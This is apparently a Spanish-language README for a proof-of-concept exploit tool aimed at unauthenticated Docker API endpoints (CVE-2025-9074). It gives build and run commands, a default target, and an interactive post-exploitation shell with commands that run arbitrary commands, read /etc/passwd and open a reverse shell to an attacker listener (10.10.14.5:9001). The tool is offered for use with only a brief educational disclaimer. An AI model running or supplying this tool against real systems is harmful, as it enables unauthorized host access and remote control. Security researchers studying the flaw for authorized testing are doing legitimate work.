Docker API CVE-2025-9074 PoC (Prueba de Concepto). Un marco de explotación sofisticado para CVE-2025-9074, que apunta a puntos finales de la API de Docker no autenticados con un shell de comandos interactivo integrado.
Un framework de explotación sofisticado para CVE-2025-9074, dirigido a endpoints de la API de Docker no autenticados con un shell de comandos interactivo integrado.
Esta herramienta automatiza la explotación de instancias de Docker expuestas sin autenticación, permitiendo la creación completa de contenedores y la ejecución de comandos en el host objetivo. La herramienta incluye un shell interactivo personalizado para operaciones posteriores a la explotación.
Nota: Esta es una implementación PoC personalizada. No descubrí CVE-2025-9074.

Detección automatizada de vulnerabilidades, descarga de imágenes, creación e inicialización de contenedores

Shell posterior a la explotación con capacidades de ejecución de comandos
git clone https://github.com/xwpdx0/poc-2025-9074
gcc poc.c -o poc-2025-9074
o puedes descargar el binario desde Releases
./poc-2025-9074
Ejecutar contra el objetivo por defecto (127.0.0.1:2375):
./poc-2025-9074
Especificar un endpoint personalizado de la API de Docker:

Tras una explotación exitosa, un shell interactivo proporciona los siguientes comandos:
| Comando | Descripción |
|---|---|
cmd <comando> | Ejecutar comandos arbitrarios dentro del contenedor |
revshell <ip> <puerto> | Desplegar un reverse shell hacia el listener especificado |
info | Mostrar información actual del contenedor y del objetivo |
exit | Finalizar la sesión interactiva |
(PoC-CVE-2025-9074)> cmd whoami
(PoC-CVE-2025-9074)> cmd cat /etc/passwd
(PoC-CVE-2025-9074)> cmd ls -la /mnt
(PoC-CVE-2025-9074)> revshell 10.10.14.5 9001
(PoC-CVE-2025-9074)> info
CVE-2025-9074 afecta a instancias de Docker con endpoints de API expuestos que carecen de mecanismos de autenticación adecuados. Esta mala configuración permite el acceso no autorizado al daemon de Docker, habilitando:
Esta herramienta se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas.
xwpd (@xwpdx0)
Licencia MIT - Consulte el archivo LICENSE para más detalles
Solo para fines de divulgación responsable e investigación de seguridad.